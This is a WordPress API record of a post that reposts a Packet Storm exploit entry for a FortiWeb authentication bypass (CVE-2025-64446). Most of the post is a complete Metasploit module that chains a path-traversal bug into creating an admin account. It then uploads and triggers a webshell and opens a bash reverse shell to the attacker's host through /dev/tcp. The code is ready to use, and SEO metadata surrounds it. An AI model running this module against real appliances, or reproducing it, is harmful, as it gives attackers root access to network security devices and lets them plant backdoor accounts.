{"id":48968,"date":"2026-04-23T12:50:25","date_gmt":"2026-04-23T12:50:25","guid":{"rendered":"http:\/\/localhost\/?p=48968"},"modified":"2026-04-23T12:50:25","modified_gmt":"2026-04-23T12:50:25","slug":"fortiweb-801-authentication-bypass-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=48968","title":{"rendered":"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:47:37&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a critical remote code execution vulnerability in FortiWeb&#8217;s management interface by chaining multiple weaknesses. It goes from authentication bypass to path traversal to arbitrary file upload to remote code execution&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-23T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:219673&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-64446&#8243;],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================\\n    | # Title     : FortiWeb 8.0.1 Authentication Bypass + File Upload RCE Metasploit Module                                         |\\n    | # Author    : indoushka                                                                                                        |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\\n    | # Vendor    : https:\/\/www.fortinet.com                                                                                         |\\n    ==================================================================================================================================\\n    \\n    [+] Summary    : This Metasploit module targets a critical Remote Code Execution vulnerability in FortiWeb\u2019s (CVE-2025-64446) management interface by chaining multiple weaknesses:\\n    \\n    Authentication Bypass \u2192 Path Traversal \u2192 Arbitrary File Upload \u2192 Remote Code Execution (root)\\n    \\n    [+] POC        :  \\n    \\n    ##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n      include Msf::Exploit::FileDropper\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;FortiWeb Remote Code Execution (CVE-2025-64446)&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module exploits a critical vulnerability in FortiWeb management interface\\n              that combines Authentication Bypass, Path Traversal, and Arbitrary File Upload\\n              to achieve Remote Code Execution as root.\\n            },\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;Author&#8217; =\\u003e [\\n              &#8216;indoushka&#8217;\\n            ],\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;CVE&#8217;, &#8216;2025-64446&#8217;]\\n            ],\\n            &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;, &#8216;unix&#8217;],\\n            &#8216;Arch&#8217; =\\u003e [ARCH_CMD, ARCH_X86, ARCH_X64],\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;Linux (Reverse Shell)&#8217;,\\n                {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n                  &#8216;Type&#8217; =\\u003e :linux_cmd,\\n                  &#8216;DefaultOptions&#8217; =\\u003e {\\n                    &#8216;PAYLOAD&#8217; =\\u003e &#8216;linux\/x64\/meterpreter\/reverse_tcp&#8217;\\n                  }\\n                }\\n              ],\\n              [\\n                &#8216;Unix Command&#8217;,\\n                {\\n                  &#8216;Platform&#8217; =\\u003e &#8216;unix&#8217;,\\n                  &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n                  &#8216;Type&#8217; =\\u003e :unix_cmd,\\n                  &#8216;DefaultOptions&#8217; =\\u003e {\\n                    &#8216;PAYLOAD&#8217; =\\u003e &#8216;cmd\/unix\/reverse_bash&#8217;\\n                  }\\n                }\\n              ]\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0\\n          )\\n        )\\n    \\n        register_options([\\n          Opt::RPORT(8443),\\n          OptBool.new(&#8216;SSL&#8217;, [true, &#8216;Use SSL\/TLS&#8217;, true]),\\n          OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;]),\\n          OptString.new(&#8216;USERNAME&#8217;, [false, &#8216;Temporary admin username&#8217;, &#8216;pwnedadmin&#8217;]),\\n          OptString.new(&#8216;PASSWORD&#8217;, [false, &#8216;Temporary admin password&#8217;, &#8216;Pwned123!&#8217;]),\\n          OptString.new(&#8216;WEBSHELL_PATH&#8217;, [false, &#8216;Webshell path&#8217;, &#8216;\/pwned.dat&#8217;])\\n        ])\\n    \\n        register_advanced_options([\\n          OptInt.new(&#8216;SHELL_TIMEOUT&#8217;, [true, &#8216;Time to wait for shell callback&#8217;, 15])\\n        ])\\n      end\\n    \\n      def check\\n        print_status(\\&#8221;Checking if target is vulnerable&#8230;\\&#8221;)\\n    \\n        test_username = Rex::Text.rand_text_alpha(8)\\n        test_password = Rex::Text.rand_text_alpha(12)\\n    \\n        if create_admin_user(test_username, test_password)\\n          delete_admin_user(test_username)\\n          return Exploit::CheckCode::Vulnerable\\n        end\\n    \\n        Exploit::CheckCode::Safe\\n      end\\n    \\n      def exploit\\n        print_status(\\&#8221;Starting exploitation against #{peer}\\&#8221;)\\n    \\n        username = datastore[&#8216;USERNAME&#8217;]\\n        password = datastore[&#8216;PASSWORD&#8217;]\\n    \\n        unless create_admin_user(username, password)\\n          fail_with(Failure::NotVulnerable, \\&#8221;Failed to create admin user\\&#8221;)\\n        end\\n    \\n        unless login_admin(username, password)\\n          fail_with(Failure::UnexpectedReply, \\&#8221;Login failed\\&#8221;)\\n        end\\n    \\n        webshell_path = upload_webshell\\n        fail_with(Failure::UnexpectedReply, \\&#8221;Webshell upload failed\\&#8221;) if webshell_path.nil?\\n    \\n        register_files_for_cleanup(webshell_path)\\n    \\n        trigger_shell(webshell_path)\\n        delete_admin_user(username)\\n    \\n        Rex.sleep(datastore[&#8216;SHELL_TIMEOUT&#8217;])\\n      end\\n    \\n      private\\n    \\n      def create_admin_user(username, password)\\n        payload = {\\n          \\&#8221;..\/..\/mkey\\&#8221; =\\u003e username,\\n          \\&#8221;password\\&#8221; =\\u003e password,\\n          \\&#8221;isadmin\\&#8221; =\\u003e \\&#8221;1\\&#8221;,\\n          \\&#8221;status\\&#8221; =\\u003e \\&#8221;enable\\&#8221;\\n        }\\n    \\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v2.0\/user\/local.add&#8217;),\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;data&#8217; =\\u003e payload.to_json\\n        })\\n    \\n        res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(&#8216;success&#8217;)\\n      rescue\\n        false\\n      end\\n    \\n      def login_admin(username, password)\\n        payload = {\\n          \\&#8221;username\\&#8221; =\\u003e username,\\n          \\&#8221;password\\&#8221; =\\u003e password\\n        }\\n    \\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v2.0\/login&#8217;),\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;data&#8217; =\\u003e payload.to_json\\n        })\\n    \\n        res \\u0026\\u0026 res.code == 200 \\u0026\\u0026 res.body.include?(&#8216;success&#8217;)\\n      rescue\\n        false\\n      end\\n    \\n      def upload_webshell\\n        shell_code = generate_payload\\n        b64_shell = Rex::Text.encode_base64(shell_code) + \\&#8221;AAA==\\&#8221;\\n    \\n        data = Rex::MIME::Message.new\\n        data.add_part(\\n          b64_shell,\\n          &#8216;application\/octet-stream&#8217;,\\n          nil,\\n          \\&#8221;form-data; name=\\\\\\&#8221;upload-file\\\\\\&#8221;; filename=\\\\\\&#8221;#{Rex::Text.rand_text_alpha(8)}.dat\\\\\\&#8221;\\&#8221;\\n        )\\n    \\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v2.0\/system\/maintenance\/backup&#8217;),\\n          &#8216;ctype&#8217; =\\u003e \\&#8221;multipart\/form-data; boundary=#{data.boundary}\\&#8221;,\\n          &#8216;data&#8217; =\\u003e data.to_s\\n        })\\n    \\n        return datastore[&#8216;WEBSHELL_PATH&#8217;] if res \\u0026\\u0026 res.code == 200\\n    \\n        nil\\n      rescue\\n        nil\\n      end\\n    \\n      def generate_payload\\n        case target[&#8216;Type&#8217;]\\n        when :linux_cmd\\n          p = payload.encoded\\n          return p if p \\u0026\\u0026 !p.to_s.empty?\\n          \\&#8221;bash -c &#8216;bash -i \\u003e\\u0026 \/dev\/tcp\/#{lhost}\/#{lport} 0\\u003e\\u00261&#8217;\\&#8221;\\n    \\n        when :unix_cmd\\n          return payload.encoded\\n    \\n        else\\n          return %Q|\\u003c?php system(\\&#8221;bash -c &#8216;bash -i \\u003e\\u0026 \/dev\/tcp\/#{lhost}\/#{lport} 0\\u003e\\u00261&#8217;\\&#8221;); ?\\u003e|\\n        end\\n      end\\n    \\n      def trigger_shell(webshell_path)\\n        send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e webshell_path\\n        }, datastore[&#8216;SHELL_TIMEOUT&#8217;])\\n        true\\n      rescue\\n        true\\n      end\\n    \\n      def delete_admin_user(username)\\n        payload = {\\n          \\&#8221;..\/..\/mkey\\&#8221; =\\u003e username\\n        }\\n    \\n        res = send_request_cgi({\\n          &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;api\/v2.0\/user\/local.delete&#8217;),\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;data&#8217; =\\u003e payload.to_json\\n        })\\n    \\n        res \\u0026\\u0026 res.code == 200\\n      rescue\\n        false\\n      end\\n    \\n      def lhost\\n        datastore[&#8216;LHOST&#8217;]\\n      end\\n    \\n      def lport\\n        datastore[&#8216;LPORT&#8217;]\\n      end\\n    \\n      def peer\\n        \\&#8221;#{rhost}:#{rport}\\&#8221;\\n      end\\n    end\\n    \\t\\n    Greetings to :==============================================================================\\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n    ============================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/219673&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/219673\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:47:37&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a critical remote code execution vulnerability in FortiWeb&#8217;s management interface by chaining multiple weaknesses. It goes from authentication bypass to path&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-48968","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=48968\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:47:37&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a critical remote code execution vulnerability in FortiWeb&#8217;s management interface by chaining multiple weaknesses. It goes from authentication bypass to path...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=48968\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-23T12:50:25+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48968#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48968\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \\\/ Code Execution_PACKETSTORM:219673\",\"datePublished\":\"2026-04-23T12:50:25+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48968\"},\"wordCount\":1198,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48968#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48968\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48968\",\"name\":\"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \\\/ Code Execution_PACKETSTORM:219673 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-23T12:50:25+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48968#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=48968\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=48968#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \\\/ Code Execution_PACKETSTORM:219673\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=48968","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-23T16:47:37&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module targets a critical remote code execution vulnerability in FortiWeb&#8217;s management interface by chaining multiple weaknesses. It goes from authentication bypass to path...","og_url":"https:\/\/zero.redgem.net\/?p=48968","og_site_name":"zero redgem","article_published_time":"2026-04-23T12:50:25+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=48968#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=48968"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673","datePublished":"2026-04-23T12:50:25+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=48968"},"wordCount":1198,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=48968#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=48968","url":"https:\/\/zero.redgem.net\/?p=48968","name":"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-23T12:50:25+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=48968#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=48968"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=48968#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass \/ Code Execution_PACKETSTORM:219673"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48968","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=48968"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/48968\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=48968"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=48968"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=48968"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}